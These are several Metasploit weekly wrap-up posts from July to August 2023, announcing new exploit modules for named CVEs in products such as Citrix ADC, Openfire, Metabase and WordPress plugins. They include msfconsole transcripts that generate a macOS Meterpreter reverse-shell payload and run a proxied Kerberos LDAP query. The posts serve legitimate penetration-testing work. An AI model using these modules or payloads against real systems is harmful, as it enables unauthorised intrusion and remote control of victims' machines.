Authors: Nairuz Abulhul, gambler, h00die, and h4ckNinja
Type: Exploit
Pull request: #18226 contributed by h00die
Path: exploits/linux/http/h2_webinterface_rce

Description: This PR adds an exploit against the H2 database’s web console. An authenticated user can issue requests to invoke built-in functionality to execute arbitrary code. There is no CVE for this issue.

Maltrail Unauthenticated Command Injection

Authors: Chris Wild and Ege BALCI
Type: Exploit
Pull request: #18280 contributed by EgeBalci
Path: exploits/unix/http/maltrail_rce

Description: This PR adds a module for an unauthenticated RCE vulnerability in Maltrail, a malicious traffic detection system. The module author indicated that this vulnerability does not have a CVE associated with it as the vendor (product team in this case) declined to assign one.

RaspAP Unauthenticated Command Injection

Authors: Ege BALCI and Ismael0x00
Type: Exploit
Pull request: #18263 contributed by EgeBalci
Path: exploits/unix/http/raspap_rce
AttackerKB reference: CVE-2022-39986

Description: This PR adds an unauthenticated command injection module for the RaspAP webgui application.

Greenshot .NET Deserialization Fileformat Exploit

Authors: bwatters-r7 and p4r4bellum
Type: Exploit
Pull request: #18253 contributed by bwatters-r7
Path: exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634
AttackerKB reference: CVE-2023-34634

Description: This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.

Enhancements and features (1)

  • #18288 from adfoster-r7 – Adds stability enhancements to Meterpreter payloads. Additionally, this adds a large suite of automated sanity tests to GitHub Actions that verify the OSX/Windows/Linux/Python/Java/PHP Meterpreter payloads work.

Bugs fixed (3)

  • #18275 from adfoster-r7 – Updates the module metadata for the Java reverse_http and reverse_https stagers so that they are treated as having a dynamic payload size instead of a static/fixed size. The size varies because the Java payload contains a user-configurable HTTP callback URL and JAR files are Zip-compressed, so the overall generated payload size changes with the configured value.
  • #18278 from rorymckinley – Fixes a crash when running the auxiliary/scanner/mysql/mysql_login module against newer versions of MySQL.
  • #18289 from zeroSteiner – Fixes a typo in the exploit/freebsd/http/citrix_formssso_target_rce docs.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit weekly wrap-up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/08/11/metasploit-weekly-wrapup-8/

New module content (1)

Metabase Setup Token RCE


Authors: Maxwell Garrett, Shubham Shah, and h00die
Type: Exploit
Pull request: #18232 contributed by h00die
Path: exploits/linux/http/metabase_setup_token_rce
AttackerKB reference: CVE-2023-38646

Description: This adds a module for an unauthenticated RCE against Metabase. Metabase versions before 0.46.6.1 contain a bug where an unauthenticated user can retrieve a setup token. With this token, they can query an API endpoint to set up a new database and inject an H2 connection string that leads to RCE.

Enhanced Modules (1)

Modules which have either been enhanced, or renamed:

  • #18264 from zeroSteiner – Updates the exploits/freebsd/http/citrix_formssso_target_rce module for CVE-2023-3519 to include two new targets, Citrix ADC (NetScaler) 12.1-65.25, and 12.1-64.17. This module now supports automatic targeting based on the Last-Modified header of the logon/fonts/citrix-fonts.css resource.

Enhancements and features (6)

  • #18191 from jvoisin – This adds support for detecting whether a Metasploit session is running in a Podman container and improves detection for sessions running in Docker, LXC, and WSL containers.
  • #18224 from rorymckinley – This adds the first iteration of specs for the SSH Login scanner.
  • #18231 from ErikWynter – This adds index selection for the modules returned via the favorites (or show favorites) command.
  • #18244 from cgranleese-r7 – Adds tests to ensure the consistency of Metasploit payloads.
  • #18274 from wvu – Updates CVE-2020-14871 exploits/solaris/ssh/pam_username_bof docs.

Bugs fixed (2)

  • #18220 from dwelch-r7 – Adds additional error handling when loading Metasploit payloads to msfconsole’s startup process to ensure missing payloads do not crash msfconsole.
  • #18260 from adfoster-r7 – This adds a fix to verify the EC2_ID module option is validated.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2023/08/04/metasploit-weekly-wrap-up-22/

Fly High in the Sky With This New Cloud Exploit!


This week, a new module was added that takes advantage of both authentication bypass and command injection in certain versions of Western Digital’s MyCloud hardware. Submitted by community member Erik Wynter, this module gains access to the target, attempts to bypass authentication, verifies whether that was successful, then executes the payload with root privileges. This works on versions before 2.30.196, and offers a lot of flexibility in just a few commands. See the original PR for more info!

OSX Meterpreter support for M1 and M2 devices

Thanks to the great work of usiegl00, Metasploit now has payload support for both M1 and M2 Arm64 devices that run without the x64 Rosetta emulator being installed on the target machine.

The new payloads are:
osx/aarch64/meterpreter/reverse_tcp
osx/aarch64/meterpreter_reverse_https
osx/aarch64/meterpreter_reverse_tcp
osx/aarch64/meterpreter_reverse_http

Example of generating a payload:

msf6 > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1
[*] Writing 812819 bytes to /Users/user/Desktop/payload_stageless...

After executing the payload on the remote host, the session will open and can be interacted with:

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: demo
meterpreter > sysinfo
Computer     : demo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >

Metasploit takes to the road

Next week, part of the Metasploit team will be in Las Vegas for Black Hat, BSides Las Vegas and DEF CON. Our own Spencer McIntyre will be demonstrating some of the latest Metasploit features and workflows for targeting Active Directory at both Black Hat and DEF CON. Be sure to stop by and check it out. We’ll also be giving out the local currency of stickers.

  • Black Hat on Thursday, August 10th at 13:00-14:30 in the Business Hall
  • DEF CON on Friday, August 11th at 10:00-12:00 in the Committee Boardroom

New module content (10)

Citrix ADC (NetScaler) Forms SSO Target RCE

Authors: Douglass McKee, Ron Bowes, and Spencer McIntyre
Type: Exploit
Pull request: #18240 contributed by zeroSteiner
Path: exploits/freebsd/http/citrix_formssso_target_rce
AttackerKB reference: CVE-2023-3519

Description: This adds an exploit for CVE-2023-3519 which is an unauthenticated RCE in Citrix ADC. By making a specially crafted HTTP GET request, an attacker can trigger a stack buffer overflow within the nsppe process which runs as root.

Western Digital MyCloud unauthenticated command injection

Authors: Erik Wynter, Remco Vermeulen, and Steven Campbell
Type: Exploit
Pull request: #18221 contributed by ErikWynter
Path: exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection
AttackerKB reference: CVE-2018-17153

Description: This adds an exploit module for an authentication bypass (CVE-2018-17153) and a command injection (CVE-2016-10108) vulnerability in Western Digital MyCloud before 2.30.196. The module first checks whether the target is vulnerable by attempting the authentication bypass followed by injecting a simple echo command. If the target is confirmed to be vulnerable, the module leverages the same command injection vulnerability to execute the payload with root privileges.

Rudder Server SQLI Remote Code Execution

Author: Ege Balcı
Type: Exploit
Pull request: #18205 contributed by EgeBalci
Path: exploits/multi/http/rudder_server_sqli_rce
AttackerKB reference: CVE-2023-30625

Description: This adds an exploit module that leverages an SQL injection vulnerability (CVE-2023-30625) in RudderStack’s rudder-server to achieve unauthenticated remote code execution. The vulnerability affects versions of rudder-server before 1.3.0-rc.1.

Intelliants Subrion CMS 4.2.1 – Authenticated File Upload Bypass to RCE

Authors: Fellipe Oliveira, Hexife, and Ismail E. Dawoodjee
Type: Exploit
Pull request: #18211 contributed by ismaildawoodjee
Path: exploits/multi/http/subrion_cms_file_upload_rce
AttackerKB reference: CVE-2018-19422

Description: This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the .htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.

AWS Instance Connection

Author: sempervictus
Type: Payload
Pull request: #17600 contributed by sempervictus
Path: payloads/singles/cmd/unix/bind_aws_instance_connect

Description: This adds AWS instance connection sessions.

OSX AArch64 Payload Support

Author: usiegl00
Type: Payload
Pull request: #17129 contributed by usiegl00
Path: payloads/singles/osx/aarch64/meterpreter_reverse_http

Description: Adds new support for multiple OSX AArch64 payloads: osx/aarch64/meterpreter/reverse_tcp, osx/aarch64/meterpreter_reverse_https, osx/aarch64/meterpreter_reverse_tcp, osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Enhancements and features (4)

  • #18223 from adfoster-r7 – This PR fixes broken msfconsole command history management when switching between shell sessions.
  • #18239 from h00die – Adds verified version numbers (1.12.1, 1.12.1-RC2, and 1.20.0) to the exploits/multi/http/apache_nifi_processor_rce RCE module.
  • #18249 from adfoster-r7 – Provides better error messages when failing to load Mettle extensions, such as the extended API extension extapi.
  • #18255 from adfoster-r7 – Removes Python2 support from the Metasploit docker container now that it is officially end-of-life and no longer used by Metasploit. Python3 support remains available.

Bugs fixed (6)

  • #18203 from adfoster-r7 – Fixes a crash when running the scanner/ssh/libssh_auth_bypass module on newer versions of Ruby.
  • #18209 from adfoster-r7 – This fixes an issue in the windows/local/bypassuac_comhijack exploit module, which was breaking due to a syntax error.
  • #18234 from D00Movenok – This fixes a bug in the 64-bit messagebox payload where it would fail to execute if user32 was not already loaded.
  • #18238 from dwelch-r7 – Fixes an issue when setting USERNAME, USER_FILE and PASS_FILE with scanner modules: previously the first username in USER_FILE would not be tested against any password in PASS_FILE.
  • #18243 from adfoster-r7 – This PR fixes an issue where an appscan import would fail due to an empty proof.
  • #18248 from adfoster-r7 – Fixes a bootup warning when running the JSON msfrpc service.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/07/28/metasploit-weekly-wrap-up-21/

Unauthenticated RCE in VMware Product


This week, community contributor h00die added an exploit module that leverages a command injection vulnerability in VMWare Aria Operations for Networks, formerly known as vRealize Network Insight. Versions 6.2 to 6.10 are vulnerable (CVE-2023-20887). A remote attacker could abuse the Apache Thrift RPC interface by sending specially crafted data and get unauthenticated remote code execution on the underlying operating system as the root user. The module first bypasses the reverse proxy that protects the RPC interface and executes its payload with root privileges. This vulnerability has been rated as critical by VMware, with a CVSSv3 base score of 9.8.

Again, WordPress Plugin

Community contributor h00die-gr3y added an exploit module that targets the File Manager Advanced Shortcode WordPress plugin. This module leverages a flaw in the data validation mechanism when uploading a file and gets unauthenticated remote code execution. The plugin does not correctly prevent uploading files with disallowed MIME types. This vulnerability is identified as CVE-2023-2068 and affects version 2.3.2 and prior.

Kerberos Authentication and LDAP socks Proxies support

This release adds support for sending Kerberos and LDAP traffic through user configurable Socks4/Socks5 proxies. The proxies can be set with the Proxies datastore option. This functionality is supported by most modules, such as SMB/WinRM/etc. An example network environment would be:

[ Attacker Machine ] -> [ Socks Proxy (192.168.123.144) ] -> [ Target (10.20.0.137)]

For instance, running the auxiliary/gather/ldap_query module with the inline option proxies=socks5:192.168.123.144:1080, or using the older set proxies socks5:192.168.123.144:1080 syntax, sends the network traffic through the user-specified SOCKS proxy, both the requests for the Kerberos tickets used for authentication and the LDAP query itself:

msf6 auxiliary(gather/ldap_query) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 ldap::auth=kerberos ldap::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...
[*] Running module against 10.20.0.137

[+] 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:389 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_426003.bin
[+] 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:389 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_291783.bin
[+] 10.20.0.137:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 10.20.0.137:389 Discovered base DN: DC=adf3,DC=local
[+] 10.20.0.137:389 Discovered schema DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 description         Built-in account for administering the computer/domain
 lastlogoff          1601-01-01 00:00:00 UTC
 lastlogon           2023-07-10 16:02:38 UTC
… omitted …
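As an added example (not Metasploit's own code), the following Ruby parses and validates a value of the form the Proxies datastore option takes, using the socks5:192.168.123.144:1080 value from the session above. The comma-separated multi-hop chain syntax and the accepted type names socks4/socks5/http are assumptions beyond what this post shows.

```ruby
# Added example, not Metasploit's own code: parse and validate a value of the
# form Metasploit's `Proxies` datastore option accepts. The post shows a single
# hop ("socks5:192.168.123.144:1080"); the comma-separated multi-hop chain and
# the accepted type names below are assumptions, not taken from the post.

# Proxy types assumed to be accepted; the post itself only shows socks5.
PROXY_TYPES = %w[socks4 socks5 http].freeze

# One hop in the chain: type, host and numeric port.
ProxyHop = Struct.new(:type, :host, :port)

# Parse "type:host:port[,type:host:port...]" into an ordered Array of ProxyHop.
# Hops are kept in the order written, i.e. the order traffic traverses them,
# starting with the hop closest to the attacker machine. Raises ArgumentError
# on any malformed entry so a bad value is rejected up front.
def parse_proxy_chain(value)
  raise ArgumentError, 'empty proxy chain' if value.nil? || value.strip.empty?

  value.split(',').map do |entry|
    hop = entry.strip
    parts = hop.split(':')
    raise ArgumentError, "malformed hop #{hop.inspect}, expected type:host:port" unless parts.length == 3

    type, host, port = parts
    type = type.downcase # accept "Socks5" as well as "socks5"
    raise ArgumentError, "unsupported proxy type #{type.inspect}" unless PROXY_TYPES.include?(type)
    raise ArgumentError, "empty host in #{hop.inspect}" if host.empty?
    unless port.match?(/\A\d+\z/) && (1..65535).cover?(port.to_i)
      raise ArgumentError, "invalid port #{port.inspect} in #{hop.inspect}"
    end

    ProxyHop.new(type, host, port.to_i)
  end
end

# Render a chain back to the canonical form, so the inline `proxies=...`
# spelling and the `set Proxies ...` spelling can be compared for equality.
def format_proxy_chain(hops)
  hops.map { |h| "#{h.type}:#{h.host}:#{h.port}" }.join(',')
end

if $PROGRAM_NAME == __FILE__
  hops = parse_proxy_chain('socks5:192.168.123.144:1080')
  hops.each_with_index { |h, i| puts "hop #{i + 1}: #{h.type} via #{h.host}:#{h.port}" }
end
```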

New module content (2)

VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE

Authors: Anonymous with Trend Micro Zero Day Initiative, Sina Kheirkhah, and h00die
Type: Exploit
Pull request: #18199 contributed by h00die
Path: exploits/linux/http/vmware_vrni_rce_cve_2023_20887
AttackerKB reference: CVE-2023-20887

Description: This adds an exploit module that leverages a pre-authenticated command injection vulnerability in VMWare Aria Operations for Networks (vRealize Network Insight). Versions from 6.2 to 6.10 are vulnerable and this has been identified as CVE-2023-20887. The module bypasses the reverse proxy that protects the access to the Apache Thrift RPC interface and executes arbitrary commands on the underlying operating system as the root user.

WordPress File Manager Advanced Shortcode 2.3.2 – Unauthenticated Remote Code Execution through shortcode

Authors: Mateus Machado Tesser and h00die-gr3y
Type: Exploit
Pull request: #18142 contributed by h00die-gr3y
Path: exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce
AttackerKB reference: CVE-2023-2068

Description: This adds a WordPress exploit that targets the WordPress File Manager Advanced Shortcode 2.3.2 plugin to gain unauthenticated Remote Code Execution through a shortcode.

Enhancements and features (1)

  • #18096 from adfoster-r7 – Updates the LDAP query module and the Kerberos authentication support for WinRM/MSSQL/SMB/LDAP/etc to work in conjunction with the user’s set Proxies datastore value, i.e. set Proxies socks5:127.0.0.1:1080.

Bugs fixed (3)

  • #18187 from cgranleese-r7 – Fixes a crash when running Ruby 3.3.0-preview1 with modules that used invalid syntax when packing or unpacking binary data.
  • #18213 from adfoster-r7 – This fixes a bug in the evasion/windows/syscall_inject module that was caused by an uninitialized variable.
  • #18225 from adfoster-r7 – This fixes multiple missing/invalid references in modules.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap up

Post Syndicated from Jack Heysel original https://blog.rapid7.com/2023/07/21/metasploit-weekly-wrap-up-20/

It’s open season on Openfire with a new RCE module in Metasploit


This week the Metasploit framework saw the addition of an RCE module which exploits a path traversal vulnerability in the instant messaging and group chat server Openfire. The module was submitted by the one and only community contributor h00die-gr3y. The module targets Openfire’s unauthenticated setup environment, in an already configured Openfire installation, to access restricted pages in the Admin Console reserved for administrative users. It uses the path traversal vulnerability to create a new admin user, which is then used to upload an Openfire management plugin weaponized with a Java native payload that triggers the RCE. The module is quite flexible and will get you shells when Openfire is running on Windows or Linux and on a variety of different Java versions.

New module content (2)

Piwigo CVE-2023-26876 Gather Credentials via SQL Injection

Authors: Rodolfo Tavares, Tempest Security, Henrique Arcoverde, and rodnt
Type: Auxiliary
Pull request: #18182 contributed by rodnt
AttackerKB reference: CVE-2023-26876

Description: This PR adds an auxiliary module that takes advantage of CVE-2023-26876 to retrieve the username and password hash from Piwigo v13.5.0 and earlier.

Openfire authentication bypass with RCE plugin

Author: h00die-gr3y
Type: Exploit
Pull request: #18173 contributed by h00die-gr3y
AttackerKB reference: CVE-2023-32315

Description: This PR adds a module for CVE-2023-32315, a remote code execution vulnerability affecting all versions of Openfire released since April 2015, starting with version 3.10.0. Patched versions are 4.7.5+, 4.6.8+ and 4.8.0+.

Enhancements and features (1)

  • #17681 from MegaManSec – This PR adds a new datastore option for Jenkins home directory to the jenkins_gather module.

Bugs fixed (0)

None

Documentation added (1)

  • #18186 from adfoster-r7 – This PR updates multiple code and console snippets within the Wiki to now have syntax highlighting

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Navya Harika Karaka original https://blog.rapid7.com/2023/07/14/metasploit-weekly-wrap-up-19/

Authentication bypass in WordPress Plugin WooCommerce Payments


This week’s Metasploit release includes a module for CVE-2023-28121 by h00die. This module can be used against any WordPress instance that uses WooCommerce Payments < 5.6.1. This module exploits an auth bypass vulnerability in the WooCommerce WordPress plugin. You can simply add a header to execute the bypass and use the API to create a new admin user in WordPress.

New module content (3)

WordPress Plugin WooCommerce Payments Unauthenticated Admin Creation

Authors: Julien Ahrens, Michael Mazzolini, and h00die
Type: Auxiliary
Pull request: #18164 contributed by h00die
AttackerKB reference: CVE-2023-28121

Description: This module exploits an auth bypass vulnerability in the WooCommerce WordPress plugin. By sending a specially crafted request to the plugin, an attacker can bypass authentication and then use the WordPress API to create an admin user in WordPress.

pfSense Restore RRD Data Command Injection

Author: Emir Polat
Type: Exploit
Pull request: #17861 contributed by emirpolatt
AttackerKB reference: CVE-2023-27253

Description: This module exploits a vulnerability in pfSense version 2.6.0 and below which allows authenticated users to execute arbitrary operating system commands as root.

SmarterTools SmarterMail less than build 6985 – .NET Deserialization Remote Code Execution

Authors: 1F98D, Ismail E. Dawoodjee, and Soroush Dalili
Type: Exploit
Pull request: #18170 contributed by ismaildawoodjee
AttackerKB reference: CVE-2019-7214

Description: Adds a new module for SmarterMail Build 6985 – .NET Deserialization Remote Code Execution (CVE-2019-7214). The vulnerability affects SmarterTools SmarterMail versions less than or equal to 16.3.6989.16341 (all legacy versions without a build number), or SmarterTools SmarterMail builds less than 6985.

Enhancements and features (0)

None

Bugs fixed (0)

None

Documentation added (2)

  • #18177 from ismaildawoodjee – Updates the Wiki to use https://metasploit.com/download instead of http://metasploit.com/download.
  • #18181 from hahwul – Updates broken links in the Wiki.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).